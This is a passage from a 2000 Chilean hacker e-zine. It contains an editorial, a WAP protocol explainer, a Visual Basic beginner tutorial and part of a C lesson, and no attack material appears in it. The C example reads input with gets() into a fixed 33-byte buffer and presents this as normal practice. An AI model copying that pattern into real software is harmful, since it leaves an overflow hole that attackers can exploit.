Copy Link
Add to Bookmark
Report

Electron Security Team Issue 2

eZine's profile picture
Published in 
Electron Security Team
 · 28 Oct 2023

øñº´ñ°`°ñø¸¸,øñ°`´°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°``°ñø¸,øñ°`°ñø 
øñº´ñ°`°ñø¸¸,øñ°`´°ñø¸ °ñø¸¸,øñ°``°ñø¸,øñ°`°ñø
øñº´ °ñø¸ °ñø¸ `°ñø
øñº´ °ñø¸ .$2*EE*2z$. °ñø¸ `°ñø
øñº´ °ñø¸ x*#"~```"!Rn·$ °ñø¸ `°ñø
øñº´ ELECTRON °ñø¸ z!~ ~@! °ñø¸ ELECTRON `°ñø
øñº´ °ñø¸ xZ~ `Zo °ñø¸ `°ñø
øñº´ SECURITY °ñø¸ $? ^%$%·ç·#~~·^]ç*`$ °ñø¸ SECURITY `°ñø
øñº´ °ñø¸ $EL"··$·$%2~$~€P*:$¸ °ñø¸ `°ñø
øñº´ TEAM °ñø¸ ?B °ñø¸ TEAM `°ñø
øñº´ °ñø¸ `?2L °ñø¸ `°ñø
øñº´ °ñø¸ `#$m.......u@#~ °ñø¸ `°ñø
øñº´ °ñø¸ ~2#tW2W$*"` °ñø¸ `°ñø
øñº´ñ°`°ñø¸¸,øñ°`´°ñø¸ °ñø¸¸,øñ°``°ñø¸,øñ°`°ñø
øñº´ñ°`°ñø¸¸,øñ°`´°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°``°ñø¸,øñ°`°ñø
øñº´ `°ñø
øñº´ ELECTRON SECURITY TEAM `°ñø
øñº´ `°ñø
øñº´ # 02 `°ñø
øñº´ `°ñø
øñº´ Revista Electronica CHILENA, del UnderGround `°ñø
øñº´ `°ñø
øñº´ Informatico Mundial `°ñø
øñº´ `°ñø
øñº´ñ°`°ñø¸¸,øñ°`´°ñø¸¸,øñ°`°ñø¸¸,| 31/12/00 |°`°ñø¸¸,øñ°`°ñø¸¸,øñ°``°ñø¸,øñ°`°ñø
øñº´ñ°`°ñø¸¸,øñ°`´°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°`°ñø¸¸,øñ°``°ñø¸,øñ°`°ñø




,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,

La informacion almacenada en el ELECTRON ^ Todo comentario emitido en el ELECTRON
es publicada con el unico fin de enseñar ^ queda bajo la unica responsabilidad
educar y orientar a sus lectores,todo ^ del nick que lo firme y no representa
acto k produsca daño y/o destruccion con ^ la forma de pensar del e-zine. Los
dicha informacion en forma directa y/o ^ caracteres y acentos son eliminados
indirecta quedara bajo el amparo y unica ^ para evitar problema de compatibilidad
responsabilidad del lector... ^ con algunos editores...

,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,. .,-`^´-,




---------------------------------------------------------------------------------
-<( ELECTRON SECURITY TEAM )>-=======================================-<( TEAM )>-
---------------------------------------------------------------------------------

-<( EleKtr0 )>-========================-<( elektro@electron-team.com )>-
-<( bAnkZide )>-========================-<( bankzide@electron-team.com )>-
-<( Bash )>-========================-<( bash@electron-team.com )>-
-<( z0rbas )>-========================-<( zorbas@electron-team.com )>-



---------------------------------------------------------------------------------
-<( ELECTRON SECURITY TEAM )>-==============================-<( COLABORADORES )>-
---------------------------------------------------------------------------------

-<( s0ul )>-=========================-<( syslogd@usa.net )>-
-<( ZychoLezz )>-=========================-<( ZychoLezz@altavista.com )>-
-<( E. Donoso )>-=========================-<( )>-



E-ZINE
°ñø,¸,øñ°

E E-Mail Oficial = electron_team@usa.net E
L Pagina Oficial = www.electron-team.subnet.dk L
E Canal Oficial = #electron / irc.terra.cl / 7000 E
C C
T T
R # 02 R
O °ñø,¸,øñ° O
N N
Editor = EleKtr0
Electrones = EleKtr0, bAnkZide, Bash, z0rbas
Colaboradores = s0ul, ZychoLezz, E. Donoso

S S
E SALUDOS E
C °ñø,¸,øñ° C
U U
R CDLR = www.cdlr.org R
I FYE = www.350cc.com I
T NoKeyZ = nokeyz.cjb.net T
Y SET = www.set-ezine.org Y
0wn3d = www.0wn3d.f2s.com
Ezkracho TEAM = www.ezkracho.com.ar
0ri0n = www.0ri0n.org
DOWNLOAD
T °ñø,¸,øñ° T
E E
A Zine Store = www.zine-store.com.ar A
M Van Hackez = www.vanhackez.com M
0ri0n = www.0ri0n.org
EST = www.electron-team.com



INDICE
`°ñø,¸,øñ°
TITULO AUTOR
`°ñø,¸,øñ° °ñø,¸,øñ°


-<( 01 )>-<( Editorial ........................................ El Editor )>-
-<( 02 )>-<( Protocolo Inalambrico de Aplicaciones II ......... EleKtr0 )>-
-<( 03 )>-<( Introduccion y Programacion en Visual Basic ...... bAnkZide )>-
-<( 04 )>-<( Programacion en C II ............................. EleKtr0 )>-
-<( 05 )>-<( Programacion basica en batch ..................... ZychoLezz )>-
-<( 06 )>-<( Snifferz ......................................... s0ul )>-
-<( 07 )>-<( "Electro-diccionario" ............................ EleKtr0 )>-
-<( 08 )>-<( Agujeros de Seguridad, Como Detectarlos .......... Bash )>-
-<( 09 )>-<( Curso de Programacion en C, Reforzamiento ........ z0rbas )>-
-<( 10 )>-<( Challenge_NT "regedit32.exe" II .................. EleKtr0 )>-
-<( 11 )>-<( Crackeando Mensajes con un Hex-Editor ............ ZychoLezz )>-
-<( 12 )>-<( Administrando un NT Desde la Consola ............. EleKtr0 )>-
-<( 13 )>-<( Como Saltarnos los URL Filters ................... bAnkZide )>-
-<( 14 )>-<( UnderNews ........................................ EleKtr0 )>-
-<( 15 )>-<( ZZZZzzzzzzZZZZZzzzzZZZZZzzzz! .................... El Editor )>-
-<( 16 )>-<( Comentarios, Reflexiones, Criticas! .............. Eduardo Donoso)>-
-<( 17 )>-<( Bug`s & Exploit`s ................................ EleKtr0 )>-
-<( 18 )>-<( Correo Electronico ............................... EleKtr0 )>-
-<( 19 )>-<( Intentando dar una Respuesta ..................... Electron Team )>-
-<( 20 )>-<( Llaves PGP ....................................... Electron Team )>-
-<( 21 )>-<( Despedida y Comentario Final ..................... El Editor )>-




,øñ°`´°ñø¸
-<[ 01 ]>-
`°ñø,¸,øñ°

Autor : EleKtr0
Titulo : Editorial

A pasado bastante tiempo desde que salio al mundo nuestra primera edicion, han
pasado bastante cosas desde k nos vimos nacer, lo mejor de todo esk muchos de
estos echos nos fueron favorables como para poder llegar a pensar en una
segunda entrega,de esta forma tenemos k dar las gracias a todas esas personas,
amigos, grupos y revistas, k creyeron en nuestra intencion y manifestaron su
apoyo de alguna u otra forma, ya sea incluyendo enlaces en sus paginas o que
enviaron su apoyo atraves de un correo, asi como tambien a aquellos que
personalmente se acercaron y lo hicieron por irc.

Como ya todos deben saberlo el equipo a crecido bastante, ya k paso de ser una
persona a estar compuesto de 5 oficiales y 2 mas k no han podido estar en esta
edicion presentes... Otra cosa importante a destacar es la colaboracion ya que
esta ha sido mas que buena, asi bien un buen numero de lectores se animo a
colaborar en esta edicion.

Como revista hemos demostrado k no tenemos nada k envidiarles a las otras que
circulan por nuestro territorio nacional, asi como tambien algunas del
exterior, los articulos son de un interes bastante general, tratados de una
forma muy simple, son faciles de entender si se manejan los terminos adecuados
en fin... y mas ahora k el Team ha cracido, las ganas de sacar una revista de
mayor y mejor calidad aumentan, queremos seguir con esta buena fama e
intentaremos en el futuro seguir elaborando una revista de primer nivel
creemos k ahora no hay escusas como para seguir creyendo en el viejo mito de
que el primer numero de algunas revistas es siempre malo o mediocre,,,

Ahora referente a la escene nacional la cosa parece estar viento en popa, asi
nos alegra mucho k NoKeyZ haya sacado su 4º entrega, por su lado el grupo CDLR
tambien sigue sumando tiempo y trayectoria asomando con su proximo lanzamiento
que ya vendria a ser la decima edicion. Ahora referente a 350cc les mandamos
fuerza y animo a seguir con esta causa para que saquen adelante el proximo
numero de su revista, fuerza muchachos! ;)

Ahora bien, referente a la fecha de lanzamiento de nuestra revista (31/12/00)
queremos mencionar que esta fecha es sin duda la mas importante del Milenio
por k marca el fin de una era llena de logros, llena de frutos, llena de cosas
positivas, pero es bastante importante mencionar que como e-zine hacemos un
alto e intentamos hacer el papel del broche de oro :D, en este caso el broche
del milenio, con el pretendemos cerrar un gran siglo, quisas en esta pequeña
manifestacion que hacemos pecamos de egocentricos, pero quien no ha pecado
alguna vez?¿ Se nos va un año, un siglo, un milenio, deseamos a todos nuestros
lectores un año provechoso y productivo...

Ahora los invito a satisfacer vuestras neuronas con una pequeña dosis de
cultura y conocimiento.Esperamos k esta nueva entrega sea del agrado de muchos
y para quienes quieran escribirnos mandando sus comentarios, criticas, dudas o
articulos podran hacerlo a atraves de nuestro correo, bye!

____________________________________________________________________ El Editor






,øñ°`´°ñø¸
-<[ 02 ]>-
`°ñø,¸,øñ°

Autor : EleKtr0
Titulo : Protocolo Inalambrico de Aplicaciones
Entrega # : II
Comentario: He observado en varias revistas del medio, que ya han empesado a
tratar este interesantisimo tema en sus pajinas y no lo dijo por nada ya que
en ese sentido nosotros como e-zine somos pioneros, ademas que el nivel de la
informacion aqui explicada es de bastante calidad comparandolo con revistas
impresas donde ademas de pagar por leer esa informacion, le hacen una mirada
muy por encima dejando muchas inquietudes en el aire, entonces ustedes los
lectores deben sentirse aun mas ogullosos de leer esta revista, que por lo
demas es su! revista! ;)

Contenido : En la primera entrega de este articulo, nos introducimos de lleno
en lo que es la arquitectura WAP, explique su funcionamiento y algunos otros
importantes detalles. En esta entrega retomaremos donde quedamos la vez
anterior describiendo la capas, protocolos, servicios, primitivas etc...


El Protocolo Inalambrico de Sesion
==================================

Este protocolo conforma la capa que esta ubicada debajo de la capa de
Aplicacion, proporcionando la capacidad necesaria para:

- Establecer una conexion fiable entre el cliente y el servidor
- Acordar las funciones del protocolo, a traves de negociaciaciones
- Intercambiar contenido entre el cliente y el servidor
- Suspender y recuperar la sesion

Este protocolo ha sido definido solo para la navegacion, definiendose como
WSP/B

Esta implementacion se realisa para establecer una conexion sobre la base de
un protocolo compatible con HTTP1.1

Para esto, se han definido un conjunto de intercambios logicos de informacion
entre la capa de sesion y capas adyasentes y permitir la comunicacion entre
la capa de sesion del cliente y la capa de sesion del servidor.


[Nota: Al intercambio logico de informacion entre la capa de sesion y capas ]
[ adyasentes es conocido como "Primitiva" ]


Ahora veremos las primitivas mas importantes:


S-Connect
=========
Se utiliza para iniciar la conexion y para notificar su exito

S-Disconnect
============
Esta primitiva se utiliza para desconectar una sesion, y para notificar al
usuario de una sesion que esa sesion no se puede establecer, que ha sido
desconectada

S-Suspend
=========
Esta primitiva se utiliza para solicitar la suspension de la sesion

S-Resume
========
Se utiliza para solicitar k se recupere la sesion

S-Exception
===========
Se utiliza para notificar aquellos eventos que no estan asignados a
una transaccion en particular

S-MethodInvoke
==============
Se uza para solicitar una operacion que deba ser ejecutada en el servidor

S-MethodResult
==============
Utilizada para devolver una respuesta a una peticion de operacion

S-MethodAbort
=============
Primitiva utilizada para abortar una solicitud de ejecucion de operacion

S-Push
======
Se utiliza para enviar informacion no solicitada desde el servidor

S-ConfirmedPush
===============
Realiza las mismas funciones que la anterior, pero con confirmacion

S-PushAbort
===========
Usada para anular una primitiva anterior del tipo S-Push o S-ConfirmedPush


Adicionalmente, existen cuatro tipos de cada una de estas primitivas:

Request ( req )
===============
Se utiliza cuando una capa superior solicita un servicio de la capa
inmediatamente inferior

Indication ( ind )
==================
Una capa que solicita un servicio utiliza este tipo de primitiva para
notificar a la capa inmediatamente superior de las actividades relacionadas
con su par, o con el proveedor del servicio

Response ( res )
================
Esta primitiva se utiliza para reconocer la recepcion de la primitiva de
tipo Indication de la capa inmediatamente inferior

Confirm ( cnf )
===============
La capa que proporciona el servicio requerido utiliza este tipo de primitiva
para notificar que la actividad ha sido completada satisfactoriamente


Estas primitivas estan definidas tanto en el diagrama de tiempos en el que se
tienen que invocar, como en los parametros de intercambios...



El Protocolo Inalambrico de Transaccion
=======================================

Proporciona los servicios necesarios para soportar aplicaciones de navegacion
(del tipo peticion/respuesta) Es a este duo peticion/respuesta, lo que vamos
a llamar como transaccion Este protocolo se situa por encima del Protocolo
Inalambrico de Datagramas y de forma opcional, de la Capa Inalambrica de
Seguridad de Transporte


Las caracteristicas de este protocolo son:

- Proporciona tres clases de servicios de transaccion:

Clase 0: mensaje de solicitud no seguro, sin mensage de resultado
Clase 1: mensaje de solicitud seguro, sin mensage de resultado
Clase 2: mensaje de solicitud seguro, con un mensage de resultado

- La seguridad se consigue a traves del uso de identificadores unicos de
transaccion, asentimientos, eliminacion de duplicados y retransmisiones

- Seguridad opcional usuario a usuario

- Opcional ,el ultimo asentimiento de la transaccion puede contener algun tipo
de informacion adicional relacionada con la transaccion, como medidas de
prestaciones, etc

- Se proporcionan mecanismos para minimizar el numero de transacciones que se
reenvian como resultado de paquetes duplicados

- Se permiten las transacciones asincronas


Al igual que en el protocolo anterior, vamos a ver las primitivas de servicio
que sustentan la comunicacion entre dos capas de transacciones situadas en dos
equipos distintos:

TR-Invoke
=========
Esta primitiva se utiliza para iniciar una nueva transaccion

TR-Result
=========
Se utiliza para devolver el resultado de una transaccion iniciada anteriormente

TR-Abort
========
Esta primitiva se utiliza para abortar una transaccion existente



Ahora voy a intentar ilustrarles el intercambio de las primitivas entre la capa
de SESION y la capa de TRANSACCION:


______ ______
| USER | |SERVER|
| ____ | | ____ |
||____|| ||____||
| | | |
| | | |
|______|<=====================>|______|

___ ___ ___
|WSP| |WSP| |WTP|

S-Method.req ====> TR-Invoke.req ====> TR-Invoke.ind ====> S-Method.ind =======|
|
S-Method.cnf <==== TR-Invoke.cnf <==== TR-Invoke.res <==== S-Method.res <======|
S-Reply.ind <==== TR-Result.ind <==== TR-Result.req <==== S-Reply.req <======|

S-Reply.res ====> TR-Result.res ====> TR-Result.cnf ====> S-Reply.cnf



Ya para ir terminando esta segunda entrega voy a detallar un poco mas las
principales caracteristicas de este importante protocolo de comunicaciones:


- Transferencia de Mensajes
=========================

Dentro de este protocolo se distinguen dos tipos de mensajes:

- Mensajes de datos
- Mensajes de control

Esta caracteristica se utiliza para la transferencia fiable de datos desde un
proveedor WTP a otro



- Asentimiento de usuario
=======================

Esta caracteristica permite al usuario confirmar cada mensaje recibido por el
proveedorWTP


- Informacion en el Ultimo Asentimiento
=====================================

Con este servicio, se puede enviar, informacion del rendimiento proporcionado por
el sistema durante la transaccion realizada, etc.


- Concatenacion y Separacion
==========================

Concatenacion es el proceso de trasmitir multiples Unidades de Datos del Protocolo
(PDU 15 ) de WTP en una Unidad de Datos del Servicio (SDU 16 ) de la red portadora

Asi pues, separacion es el proceso de separar multiples PDUs de un unico SDU (esto
es, el proceso inverso al anterior)

Esto provee de eficiencia en la transmision inalambrica, al requerirse un menor
numero de transmisiones


- Transacciones Asincronas
========================

Son bastantes las transacciones k deben ser procesadas de forma asincronica, deben
ser capaz de iniciar multiples transacciones antes que reciba la respuesta a la
primera transaccion


- Identificador de la Transaccion
===============================

Cada transaccion esta identificada de forma unica por los pares de direcciones de
los sockets (Direccion fuente, puerto fuente, direccion destino y puerto destino)
y por el Identificador de Transaccion (TID 17 )


- Segmentacion y re-ensamblado
============================

Si la longitud del mensaje supera la Unidad Maxima de Transferencia (MTU 18 ), el
mensaje puede ser segmentado por el WTP y enviado en multiples paquetes. Puediendo
ser enviados y asentidos en grupos.

Autor : EleKtr0
Titulo : Protocolo Inalambrico de Aplicaciones
Entrega # : II
E-mail : elektro@electron-team.com
Bibliografia : [WAPARCH] "Wireless Application Protocol Architecture Specification"
URL: http://www.wapforum.com/

,øñ°`´°ñø¸ 
-<[ 03 ]>-
`°ñø,¸,øñ°

Autor : bAnkZide
Titulo : Introduccion y Programacion en Visual Basic
Entrega # : I
Comentario: En este segundo numero de la revista, siendo este mi primer
articulo para el ELECTRON queria mandar unos saludos especialmente a [dNa]Clan
a todos los que me conocen en Terra, y a todos los locos de la scene.
A EleKtr0 por sacar adelante este proyecto y a todos los de la revista k ojala
sigamos con esto, el trabajo es duro pero hay que seguir dandole apoyo a la
scene nacional.

Contenido :

Indice
======

1. Introduccion

2. Explicando lo Basico

3. Hagamos Nuestro Primer Programa

3.1 Los Menus
3.2 CommandButton's y Labels
3.3 Msg Box
3.4 Input Box
3.5 Frames y OptionButtons

4. Termino




1) Introduccion:

Visual Basic es un lenguaje de programacion muy usado actualmente.De hecho,
muchos de los programas que tienes en tu Win estan hechos en visual. Aparte de
ser facil de programar, ya que como su nombre lo dice "Visual", es a traves de
los tipicos objetos de Windows, hablo de los botoncitos, frames, listbox,check
box, etc. Bueno, pero que puedo hacer con Visual? De todo. Juegos, programas,
etc. Es bueno tener una base o saber programar en otro lenguaje, ya que asi,
visual se te va a hacer pan comido. Si no sabes, no importa ya que aqui se
explicaran algunos conceptos.

Para programar en este lenguaje tienes que tener alguna version del Visual
Basic, yo te recomiendo la 6.0 en español, con la que vamos a trabajar aqui.



2) Explicando lo Basico:

Al abrir el VB (Visual Basic), y elegir la opcion "Exe Estandar", se te va
a abrir una ventana blanca,y adentro de esta un formulario que es una ventana
gris con puntitos negros adentro. Bueno, la ventana blanca, va a ser el
Proyecto, o sea que puedes tener varios formularios dentro de un proyecto.
Dentro de los formularios vamos hacer el programa. Se abre solo uno por
defecto, pero por ahora no necesitamos mas.

Si ves hacia la izquierda, veras una ventanita que arriba dice "General".
Esta es donde se encuentran los objetos. De ahi los pasas directamente al
formulario.

A tu derecha, te deberian aparecer tres ventanas que estan casi unidas.
La de arriba es la que te muestra los formularios dentro del proyecto. La del
medio que se llama "Propiedades" es la mas importante.Esta contiene todas las
opciones del objeto que seleccionas o el mismo formulario.Veras opciones como
"Nombre", "Caption", bueno cada objeto tiene sus propias opciones. Ya vamos
a explicar pare que sirve cada una.

La ventana de mas abajo es donde configuras que aparezca el formulario
cuando es ejecutado.



3) Hagamos nuestro Primer Programa:

Bueno, estamos en la pantalla principal del VB. Como te explique
anteriormente tienes el formulario. Haz click en este y mira la pantalla
propiedades. en (Nombre) ahi ponle un nombre que sea facil. Este servira
despues cuando programemos, asi que ponle algo como frm_principal o algo por
el estilo. Si sigues observando veras BackColor. Ahi le puedes cambiar el
color de fondo. En StartupPosition, le dices donde quieres que aparezca el
formulario cuando sea ejecutado. Ponle Center Screen para que te aparezca al
medio. Bueno y tu le das el tamaño al formulario. Si quieres ver como esta
quedando el diseño y verlo como si lo estuvieras ejecutando en verdad, apreta
F5 en tu teclado.



3.1) Los Menus

Ya teniendo esto, vamos a ver como se hacen Menus. En esta ocasion vamos a
hacer uno que diga Archivo -> Salir y que cierre el programa. Vamos a
"Herramientas -> Editor de Menus" o Control+E y se nos abre una ventana. En
Caption pongamos &Archivo. "&" significa que con la letra A tambien se activa
esa opcion. Ya veran para que sirve. Aunque es opcional. Despues en Name pone
archivo tambien. Hay mas opciones, pero dejenlas como estan. Despues uds. van
probando para que sirve cada una. Bueno,abajo hay una lista. Te deberia salir
&Archivo y $Salir, que supongo que ya lo hiciste?. Seleciona en la lista
$Salir y apreta el boton que tiene una flecha hacia la derecha. Te deberia
aparecer algo asi:

&Archivo
....&Salir


Eso significa que Salir esta dentro del menu Archivo. Ponemos aceptar y veras
en el formulario, el menu archivo con sub menu Salir. Seleciona ahora Salir
ahi mismo para entrar a la programacion de este objeto.O sea las intrucciones
que debe hacer cuando el usuario aprete ahi. Hazlo y te deberia abrir una
nueva ventana con esto:

Private Sub salir_Click()

End Sub


Ahi, "salir" es el nombre interno que le pusiste a ese objeto, no el caption.
Estos pueden ser distintos si quieres, y "Click()" significa que la
instruccion se hara a traves del click. La instruccion para salir es
"Unload me", y debes ponerla asi:

Private Sub salir_Click()
Unload Me
End Sub

Listo. Ahora apreta F5, elige salir y se deberia cerrar. Tu puedes seguir
haciendo menus, para practicar hazte uno con la instruccion "Beep". Va a
hacer un sonido de Bucle.



3.2) CommandButton's y Labels

Ahora que ya tienes algo,hazte un CommandButton adentro del formulario del
tamaño que quieras. En la pantallita de General tiene la forma de un boton.
Hazlo y ahora en la ventana propiedades hazle las modificaciones de nombre,
caption y diseño que quieras. Ahora es un Label. Es el icono de una "A"
mayuscula. Hazle el tamaño que quieras y borrale el caption. Recuerda de
ponerle nombres de los que te acuerdes por que son importantes para despues
programar. Por defecto te pone Label1, yo lo voy a dejar asi no mas.

Ahora tenemos el boton y el label. Lo que vamos a hacer es que cuando se
aprete el boton, muestre algo en el Label y ejecute un programa externo.
Hagamos doble click a el boton para ir a sus instrucciones.

Escribamos algo asi:


Private Sub Command1_Click()
Label1.Caption = "La Calculadora se Ejecuto"
Dim a
a = Shell("C:\windows\calc.exe")
End Sub


Si ven en la primera linea decimos que el Caption del Label1, o sea el label
que tenemos hecho, va a ser igual a ese texto entre comillas cuando el boton
sea apretado.Entienden mas ahora? Despues la instruccion Dim es para definir
una variable. La variable ahi se llama "a". En la linea siguiente la varible
creada la igualamos a la ejecucion de la calculadora. Apreta F5 y pruebalo.
Recuerda que con estos objetos puedes hacer mil cosas mas,solo te esoy dando
un ejemplo de lo que podrias hacer.



3.3) Msg Box

Esto es Simple, es un mensaje en una ventana externa. Hazte un boton nuevo
que por defecto se deberia llamar Command2. Hazle doble click y le ponemos
la instruccion

Dim b
b = MsgBox("31337 Msg Box")


Ejecuta el programa para que veas lo que pasa.



3.4) Input Box

La diferencia de esta con la MsgBox es que en esta se pueden ingresar
datos en variables. Veamos, crea un nuevo boton y un label tambien. Si
quieres ocupa el label que ya hiciste. Yo voy a crear uno nuevo. Todo este
proyecto que estamos haciendo va a ir adjunto, para que te guies. Vamos a la
programacion del boton y ponemos esto:


Private Sub Command3_Click()
Dim c As String
c = InputBox("Ingresa tu Nick...")
Label2.Caption = c
End Sub


Definimos la varible "c" como String. Esto significa que es de tipo caracter
o una palabra. Hace el input box y por ultimo iguala el Caption del Label2 ,
que es el label que creamos, con "c". En ese momento "c" vale el nick que
pusiste en el Input, por eso el label agarra ese valor o palabra.



3.5) Frames y OptionButtons

Los frames podrian ser una especie de sub formularios, por que puedes poner
objetos adentro de estas. Hacerlas visibles, invisibles, de todo. En este
ejemplo vamos a hacer un frame, un label, un boton y dos option buttons's.
Haz un label ni tan grande donde aparecera que option seleccionaste.Hazte los
options, el boton y por ultimo el frame. Ahora seleciona los dos option, el
label y el boton, con control o juntandolos hazles un Cut. Ahora,seleciona el
frame y haz un Paste. Te deberian haber aparecido los cuatro objetos
selecionados adentro del frame. Por eso te dije antes que era como un sub
formulario. Ajusta el frame para que quede ordenado. Recuerda ver el ejemplo
adjunto para que te guies. La idea es que se selecione el option que uno
quiera y a traves del boton ver los resultados en el label. Veamos como
quedaria la programacion del boton:


Private Sub Command4_Click()
If Option1 Then
Label3.Caption = "Ocupas Windows"
End If

If Option2 Then
Label3.Caption = "Ocupas Linux"
End If
End Sub



Primero pregunta Si "Option1" esta activado o selecionado,entonces el caption
del label3 vas a ser eso. Pero si no esta selecionado, se va a saltar ese
procedimiento y se va a ir al otro, que pregunta si el option2 esta
selecionado.



4) Termino

Bueno ya hemos visto algunas cosillas de VB,que espero que te hayan servido
y ahora que ya tenemos nuestro proyecto, vamos a hacer el Exe. Anda a Archivo
--> Generar nombre.exe.... Eliges el dir donde guardarlo y listo, quedo tu
proyecto en un exe. Tambien adjunto el exe hecho por mi de este articulo para
que lo veas. A lo mejor, este articulo va a continuar, yo creo que si,
explicando mas cosas, pero tambien tienes que usar tu imaginacion y empezar
a trabajar con el VB y conocerlo bien. Eso es todo por ahora nos vemos en el
proximo ELECTRON.


Autor : BankZide
Titulo : Introduccion y Programacion en Visual Basic
Entrega # : I
E-mail : bankzide@electron-team.com







,øñ°`´°ñø¸
-<[ 04 ]>-
`°ñø,¸,øñ°


Autor : EleKtr0
Titulo : Programacion en C
Entrega # : II
Comentario: Espero que el articulo anterior de este pequeño curso les halla servido
y con el hayan descubierto k el lenguaje C no es ninguna cosa sacada de otro mundo,
ni algo imposible de aprender o de entender,por otra parte tambien debo suponer que
han estudiando por su cuenta y k han leido otros txt en relacion a este apasionante
mundo de la programacion

En el capitulo anterior nos internamos en el codigo de nuestro primer programa y
analisamos cada una de las lineas del "esqueleto" que lo componia, haci concimos la
libreria estandar de funciones,declaramos las primeras variables y funciones,en fin
ya hemos visto lo basico del C, pero en esta ocacion intentaremos indagar de forma
mucho mas profunda, pero al mismo tiempo tratare de no enredar mucho las cosas,asik
tomare el mismo ejemplo de la primera entrega y le iremos haciendo los cambios que
sean necesarios para una clara explicacion

Contenido : Una de las principales caracteristicas del lenguaje C son sus funciones
El lenguaje C en si, tiene alrededor de 30 palabras reservadas y ninguna de ellas
realisa tareas de tan alto nivel como la salida de texto por pantalla, los calculos
o la escritura de datos sobre un archivo. Todas estas tareas son reservadas a las
funciones, que generalmente ya estan definidas en la libreria estardar de funciones
del compilador

El concepto de funcion se puede incluso llevar a que un mismo programa puede ser
definido como una funcion. Un programa tipico de C no es como el que se vio en la
entrega anterior, sino que se suelen definir y llamar a varias funciones, para
descargar a "main()" de codigo, ya basta! de bla,bla, bamos por la accion!


/* Progama de bienvenida al curso de C v2.0 */

#include <stdio.h>
void saluda(char persona[])
{
printf("!Hola, %s!, soy EleKtr0 y te doy la bienvenida al curso de C\n",persona);

}

int main()
{
char nombre[33];
printf("¿como te llamas?");
gets(nombre);
saluda(nombre);
}


Ahora pasamos a la explicacion del codigo, aunque muchos ya se han aprendido la
estrucutra del programa volveremos a repasarla y para los que aun no entienden
nada entonces los remito al numero 01 del electron donde encontraran la primera
entrega de este curso... ya ok veamos entonces:



(01) /* Progama de bienvenida al curso de C v2.0 */

Aqui le comentamos al mundo que esta es la segunda version de nuestro programa



(02) #include <stdio.h>

Como ya lo saben, esto es la declaracion de la libreria estandar de funciones



(03) void saluda(char persona[])

Aqui se desea definir una funcion llamada "saluda()" a la que le pasamos como
parametro una cadena de caracteres, a la que dentro de la funcion llamaremos
"persona" y que no nos devolveria ningun valor (void)


(04)

{
printf("!Hola, %s!, soy EleKtr0 y te doy la bienvenida al curso de C\n",persona);

}

int main()
{
char nombre[33];
printf("¿como te llamas?");
gets(nombre);


para la explicacion de este pedazo de codigo leanse el capitulo anteriror... ;)


(05) saluda(nombre);

esta linea lo unico que hace es llamar a la funcion "saluda()" que definimos al
comienzo y pasarle como parametro la variable"nombre",haci dentro de la funcion
"saluda()" vamos a encontrar una variable llamada "persona" que a su ves tendra
el valor de la variable "nombre" y que sera la que se visualice en el "printf"


La mayor parte de la informacion es de tipo numerica, por lo tanto se hace
necesario contar de systemas capaces de procesar todos los numeros que sean
digitados y sin gastar muchos recursos de memoria , para ello el lenguaje C
consta con varios tipos de systemas de almacenamineto numerico,algunos solo
pueden representar en pantalla numeros enteros y otros numeros decimales

Los de tipo entero mas importante son "char" e "int",mientras que "char" ocupa
un byte, "int" por su parte suele constar de 32 bits en Linux

El numero de valores que cada tipo suele representar, asi como su rango puede
modificarse mediante las palabras "signed" "unsigned" y "short" "long",

Una ves que se especifica "unsigned" no se permite usar numeros negativos
lo que asu ves permite duplicar el numero de positivos utilizables,

Cuando se especifica "short" el numero ocupara la mitad de espacio en memoria,
pero puede representar muchos menos valores distintos

Ademas de los ya mencionados,se disponde tambien de los tipos reales,o de coma
flotante, como son "float" o de simple y "double" presicion respectivamente...

Se diferencian en k "double" ocupa el doble de memoria que "float", que ademas
"double" soporta numeros de hasta 8 ordenes de magnitud, positivos y negativos
y que el numero de cifras de un "double" es de 15, contra 7 del "float"


Como ya les mencione anteriormente, una variable es un espacio de memoria k se
reserva y al que se le da un nombre,con el objetivo de poder acceder a ella de
una manera mucho mas facil y clara. Para que nuestro programa echo en C pueda
usar variables es necesario declararlas antes de su uso,para que el compilador
reserve con anticipacion su espacio en la memoria. Para declarar una variable
es necesario escribir el nombre del tipo de variable a utilizar seguida por el
nombre que le daremos a nuestra variable y al final poner el omnipotente signo
de punto y coma ";"

unsigned int paises_del_mundo;
char pais;
float personas;

Ya deben saber que no es llegar y ponerle nombre a una variable,ahy que seguir
una serie de parametros que vimos en el capitulo anterior, asi que ya saben...

Para asignar un valor a una variable, se escribe el nombre de la variable
seguida de un signo igual a "="y el valor que se le desea asignar y nuevamente
terminando con el signo punto y coma ";" asi para asignarle el valor de "69" a
la variable "posicion" tendriamos que escribirla asi:

posicion = 69;

Entonces desde este momento la variable "posicion" pasa a tomar el valor "69"
y podemos tambien usar esta variable para asignarle el mismo valor a otra
variable distinta:

comodidad = posicion;

Y la variable "comodidad" pasa a tomar el valor almacenado en la variable
"posicion" claro que esta variable ("posiscion") mantiene su valor

Ahora si lo que queremos es darle un valor determinado en cierta parte del
programa, entonces deberiamos proceder de la siguiente manera:

int posiscion = 69;


Tambien es posible realizar operaciones matematicas con valores inmediatos,
con numeros naturales (0-9) y con variables, almacenando su valor en otra
variable, por ejemplo:

buenarelacion = horas * posicion * 3;

En este ejemplo alamacenamos en la variable "buenarelacion" el resultado a dar
entre la multiplicacion de la variable "horas" por la variable "posicion"y por
el numero "3"

Lo comun es almacenar en las variables numeros de uso frecuente, ya sea por k
se usan mucho en el programa y son complicados de teclear una y otra ves , o
cuando se una actualisacion de una version a otra... se corre el riesgo de
modificar accidentalmente el valor de estas variables y el programa no da los
resultados optimos, para evitar todo esto existen las constantes

Las constantes son espacios de memoria, similares a las variables, que tambien
tienen tipo y nombre,a las k se le asigna un valor a la hora de su declaracion
Este valor no puede cambiar posteriormente en el programa, se declaran igual k
las variables ya vistas pero anteponiendo la palabra "const":

const double pi = 3.14159265358979;

De esta forma no necesitaremos escribir la expresion numerica de "pi" cada vez
